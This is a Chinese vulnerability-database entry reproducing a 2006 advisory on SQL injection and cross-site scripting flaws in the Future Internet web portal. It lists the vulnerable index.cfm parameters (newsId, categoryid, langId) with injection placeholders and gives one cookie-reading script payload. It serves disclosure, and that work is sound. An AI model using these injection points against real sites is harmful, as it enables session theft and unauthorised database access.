Multiple Bugs in Future Internet ( XSS & SQL Injection )

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053076 漏洞类型
发布时间 2006-12-29 更新时间 2006-12-29
CVE编号 CVE-2006-6777
CVE-2006-6776
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006120129
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Hello 
Vulnerable : Future Internet
web : http://www.future-internet.com

SQL Injection :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.Showpa
ge&categoryid=311&newsId=[SQL]

http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.Showpa
ge&categoryid=[SQL]

http://www.example.com/path_of_script/index.cfm?langId=[SQL]

XSS :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.ShowPa
ge&categoryId=[XSS]

For example u can put :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.ShowPa
ge&categoryId=<script>alert(document.cookie)</script>

Discovery by Linux_Drox ( Qptan )
S-H-T
www.LeZr.Com/vb